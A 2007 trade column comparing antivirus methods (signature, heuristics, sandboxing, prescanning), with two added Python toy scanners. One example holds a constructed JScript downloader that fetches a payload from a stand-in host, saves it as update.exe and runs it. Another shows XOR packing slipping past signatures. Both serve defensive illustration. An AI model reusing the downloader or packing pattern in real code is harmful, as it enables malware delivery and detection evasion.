Henry: Protect your valuables
For fighting Internet-based government espionage, traditional malware defenses aren’t nearly enough
- By Paul A. Henry
- Jul 30, 2007
A major threat plaguing government networks around the world today is Internet espionage — using the Internet for gaining access to classified government information through targeted attacks. Those attacks often combine previously unidentified malware with social engineering tactics. Recent public disclosure of the details of one such attack identified malware in an e-mail attachment as the entry point to a State Department network. The increase in such attacks on government agencies raises serious concerns about the effectiveness of traditional malware defenses.
Historically, antivirus products have been the first line of defense in combating malware attacks on government networks. Unfortunately, the majority of antivirus solutions are reactive in nature and offer little, if any, capability to detect a new piece of malware.
There are at least six antivirus methodologies in use.
1: Signature
Signature-based antivirus is probably the oldest method of stopping virus-laden traffic. It is an exact science and produces definitive results. Either a virus matches the known signature, or it doesn’t. One of the advantages of this approach is speed. It doesn’t take many CPU cycles to compare malicious code with known signatures. Although this is a somewhat dated technology, it is regaining popularity as some security product vendors add antivirus capabilities to their all-in-one security solutions and try to minimize the performance impact of that added capability.
A further consideration is that, although the signature-based antivirus method offers good protection from known threats, it is not effective against unknown variants of known threats and offers no protection from new, previously unidentified threats. That weakness renders signature-based antivirus methods fully dependent on a vendor’s ability to react quickly and implement signatures for new threats before they can infect their customers — a feat that is impossible.
2: Advanced signature
By focusing on a smaller segment of malicious code and thus reducing the signature size for a known threat, antivirus vendors have been able to improve on traditional methods of protecting against variants of known threats. However, this methodology yields only a probability that a piece of code is a threat and is prone to false positives. It also suffers from the same inability to protect against new, unknown threats.
To reduce the window of opportunity, a clever approach in both traditional signature and advanced signature-based antivirus measures is connecting multiple antivirus products in a series. The potentially infected code is inspected by using each vendor’s solution sequentially. If any of the vendors finds a match for its respective signatures, the code is flagged as malicious. By spreading the inspection across multiple vendors, this methodology reduces the risk associated with dependence on a single vendor that may or may not have an acceptable response time for a particular threat.
3: Sandboxing
Rather than relying upon signatures, “sandboxing” provides a mechanism for running the potentially malicious code in an isolated environment in some form of a virtual machine. Sandboxing is more effective than signature-based antivirus methods, but it can still be fooled by a smart malicious code programmer who does a sufficient job of hiding the code’s malicious intent (for example, by encrypting the portions of the program that carry the malicious actions, storing them in the code’s data section, and only later decrypting them and executing them against the host).
4: Passive heuristics
A passive heuristic antivirus methodology, which applies experience-derived knowledge, is similar to an advanced signature-based antivirus approach. In this scenario, the vendor establishes a library of code segments that have a high probability of being malicious and searches through the potentially malicious code for those code segments. If one is found in the code, the code is considered malicious and appropriate action is taken.
Although it is faster than sandboxing, and perhaps more effective than traditional signature-based antivirus methods, a passive heuristic-based antivirus method can be easily fooled by a knowledgeable malicious code programmer using encryption, run-time packers or polymorphism. When used as the exclusive protective mechanism, a passive heuristics-based approach can produce high false-positive rates.
5: Advanced heuristics
Advanced heuristics antivirus methodologies vary dramatically by vendor but share some common functionality. This approach normally combines several methods, including signature-based antivirus, advanced signature-based antivirus and perhaps a modified version of traditional sandboxing that runs only specific portions of the potentially malicious code. Combining signatures, which protect against known attacks, with sandboxing, which can catch new attacks, affords the greatest risk mitigation from current and future threats.
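To make the trade-offs in methods 1 through 5 concrete, the following is an added example written for this page; it is not code from the column or from Secure Computing. It builds toy versions of an exact signature check, a shortened "advanced" signature, two vendors' engines chained in series, and a minimal unpack-then-rescan step that stands in for the sandbox or advanced-heuristic stage, and runs them against a constructed sample, a constructed variant and a constructed XOR-packed build of the same sample. The sample bytes, the signatures and the packer stub format are all invented for the demonstration and correspond to no real malware.

```python
"""Added example (not from the column): toy signature, advanced-signature,
chained-engine and unpack-then-rescan checks over constructed samples."""
import re

# Constructed stand-in for a malicious program: header, a marker playing the
# role of the malicious routine, padding and a trailer.
ROUTINE = b"DEMO_MALICIOUS_ROUTINE_v1"
SAMPLE = b"MZ-header" + b"\x00" * 8 + ROUTINE + b"\x00" * 8 + b"trailer"

# 1: Signature -- an exact byte string covering the routine and its padding.
SIGNATURE = b"\x00" * 8 + ROUTINE + b"\x00" * 8

# 2: Advanced signature -- a shorter pattern over the routine's core only, so
# byte changes around it still match (at the cost of more false positives).
ADVANCED_SIGNATURE = re.compile(rb"DEMO_MALICIOUS_ROUTINE_v\d")

# A second vendor (constructed) that already ships a signature for the v2
# variant but has never seen the original.
VENDOR_B_SIGNATURE = b"ROUTINE_v2"


def signature_scan(data: bytes) -> bool:
    return SIGNATURE in data


def advanced_signature_scan(data: bytes) -> bool:
    return ADVANCED_SIGNATURE.search(data) is not None


def vendor_b_scan(data: bytes) -> bool:
    return VENDOR_B_SIGNATURE in data


def chained_scan(data: bytes, engines) -> bool:
    """Engines in series: the sample is malicious if any one engine says so."""
    return any(engine(data) for engine in engines)


# Attacker side.  A variant changes the version tag and the padding bytes.
VARIANT = SAMPLE.replace(b"_v1", b"_v2").replace(b"\x00" * 8, b"\xff" * 8)

# A packed build stores the routine XOR-encoded behind a constructed stub
# format: marker, 1-byte key, 1-byte length, encoded routine.  Nothing in the
# file matches the plaintext signatures until the stub has run.
STUB_MARKER = b"UNPACK_STUB:"
XOR_KEY = 0x5A


def xor_bytes(buf: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in buf)


PACKED = (b"MZ-header" + STUB_MARKER + bytes([XOR_KEY, len(ROUTINE)])
          + xor_bytes(ROUTINE, XOR_KEY) + b"trailer")


def emulate_and_scan(data: bytes, scanner) -> bool:
    """Sandbox-style check: scan the file as stored, then 'execute' the unpack
    stub (decode what it would place in memory) and scan that as well."""
    if scanner(data):
        return True
    pos = data.find(STUB_MARKER)
    if pos == -1:
        return False
    hdr = pos + len(STUB_MARKER)
    key, length = data[hdr], data[hdr + 1]
    encoded = data[hdr + 2: hdr + 2 + length]
    return scanner(xor_bytes(encoded, key))


def report(data: bytes) -> dict:
    """Which methods catch a given file."""
    return {
        "signature": signature_scan(data),
        "advanced_signature": advanced_signature_scan(data),
        "chained_a_b": chained_scan(data, [signature_scan, vendor_b_scan]),
        "emulated_advanced": emulate_and_scan(data, advanced_signature_scan),
    }


if __name__ == "__main__":
    for name, blob in [("original", SAMPLE), ("variant", VARIANT), ("packed", PACKED)]:
        print(name, report(blob))
```

Run stand-alone, the report shows the pattern the column describes: the exact signature catches only the original; the advanced signature and the chained vendors also catch the variant; only the unpack-then-rescan step catches the packed build, and even that works only because the stub format is one the emulator understands, which is exactly the gap a determined packer author aims at.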
This methodology can provide better protection from both known and unknown code. It also offers a more acceptable false positive rate. From a performance standpoint, it is slower than a traditional signature approach, but it can provide better performance than a traditional sandbox approach. As with any approach, the advanced heuristic antivirus methodology requires regular updates to stay ahead of evolving threats.
6: Prescanning
Another approach, called “prescanning,” builds on sandboxing and combines three kinds of check: it verifies digital signatures and blocks untrusted program code, screens and blocks suspicious code based on its potential behavior, and filters potentially harmful code that tries to exploit vulnerabilities on the client. Prescanning involves multiple actions to provide protection, including:
- Examining any ActiveX controls and Java applets for digital signatures and verifying that the data was signed by an authority and has not been altered since the signature was applied.
- Performing heuristic analysis, looking for certain instructions or commands in a program that are not found in typical application programs. Potential function calls are examined regardless of the actual program flow, and potentially malicious functions are classified based on a given set of rules. To enhance performance, digital signatures are linked to a library of previously examined safe ActiveX controls for comparison, so that ActiveX code that has already been examined is not examined again.
- Scanning and filtering out any remaining suspects, such as scripts that try to exploit vulnerabilities of the client. The scripts themselves may not be malicious, but they are potential enablers to inject or execute further malicious code. Detecting and filtering such scripts interrupts any malicious payload being distributed to the clients.
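The heuristic step above has two properties worth seeing in code: calls are enumerated regardless of control flow, and code already judged safe is not re-examined. The following is an added example written for this page, not code from the column or from any prescanning product. It lists every COM object and method a constructed JScript fragment could invoke, including calls sitting in a branch that never executes, classifies the combination with a small constructed rule set, and caches safe verdicts. The cache is keyed by a content hash, which is an assumption standing in for the digital-signature link the text describes. The ProgIDs named (MSXML2.XMLHTTP, ADODB.Stream, WScript.Shell) are real Windows COM objects, but the scripts are only text here and never run.

```python
"""Added example (not from the column): flow-insensitive call enumeration,
rule-based classification and a safe-code cache for a toy prescanner."""
import hashlib
import re

# Constructed JScript in the style of a downloader.  The dangerous calls sit
# in a branch that can never run; an analysis that only follows reachable
# code would miss them.
DOWNLOADER_SCRIPT = r"""
var x = new ActiveXObject("MSXML2.XMLHTTP");
if (new Date().getFullYear() < 1990) {
    x.open("GET", "http://example.invalid/payload.bin", false);
    x.send();
    var s = new ActiveXObject("ADODB.Stream");
    s.Write(x.responseBody);
    s.SaveToFile("update.exe", 2);
    new ActiveXObject("WScript.Shell").Run("update.exe");
}
"""

# Constructed benign script: fetches data and displays it, nothing more.
BENIGN_SCRIPT = r"""
var x = new ActiveXObject("MSXML2.XMLHTTP");
x.open("GET", "http://example.invalid/news.json", false);
x.send();
document.getElementById("news").innerText = x.responseText;
"""

PROGID_RE = re.compile(r'ActiveXObject\(\s*"([A-Za-z0-9.]+)"\s*\)')
METHOD_RE = re.compile(r'\.([A-Za-z_]\w*)\s*\(')


def enumerate_calls(script: str):
    """Every ProgID instantiated and every method invoked, ignoring flow."""
    return set(PROGID_RE.findall(script)), set(METHOD_RE.findall(script))


# Constructed rule set: (capability, required objects, required methods).
RULES = [
    ("network_fetch", {"MSXML2.XMLHTTP"}, {"open", "send"}),
    ("write_file", {"ADODB.Stream"}, {"SaveToFile"}),
    ("execute", {"WScript.Shell"}, {"Run"}),
]


def classify(script: str) -> list:
    """Capabilities the script could exercise, in rule order."""
    progids, methods = enumerate_calls(script)
    return [name for name, objs, meths in RULES
            if objs <= progids and meths <= methods]


def verdict(capabilities: list) -> str:
    # Fetch, write to disk and execute together form the downloader pattern.
    caps = set(capabilities)
    if {"network_fetch", "write_file", "execute"} <= caps:
        return "block"
    if "execute" in caps or "write_file" in caps:
        return "suspicious"
    return "allow"


class Prescanner:
    """Caches safe verdicts by content hash (assumption: stands in for the
    signed-control library in the text) so safe code is analysed once."""

    def __init__(self):
        self.known_safe = set()
        self.examined = 0  # how many scripts went through full analysis

    def scan(self, script: str) -> str:
        digest = hashlib.sha256(script.encode()).hexdigest()
        if digest in self.known_safe:
            return "allow"
        self.examined += 1
        result = verdict(classify(script))
        if result == "allow":
            self.known_safe.add(digest)
        return result


if __name__ == "__main__":
    p = Prescanner()
    print("benign:", p.scan(BENIGN_SCRIPT), classify(BENIGN_SCRIPT))
    print("downloader:", p.scan(DOWNLOADER_SCRIPT), classify(DOWNLOADER_SCRIPT))
```

Because the enumeration is purely lexical, the dead branch in the downloader still contributes its calls and the script is blocked; the same property means an obfuscated script that builds its ProgID strings at run time would slip past this pass, which is why the column pairs prescanning with a sandbox rather than relying on it alone.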
Cyberspies that target Defense Department data to gain an advantage in future conflicts are using targeted malware to penetrate government networks. Clearly, espionage has found its way to the Internet, and it has been reflected in headline-grabbing attacks against both unclassified and classified government networks worldwide. Our experience has shown that using advanced heuristics-based, antivirus methods combined with prescanning as a direct replacement or as a complement to existing traditional antivirus defenses can provide the necessary risk mitigation to counter these threats.
Henry is vice president of technology evangelism for Secure Computing.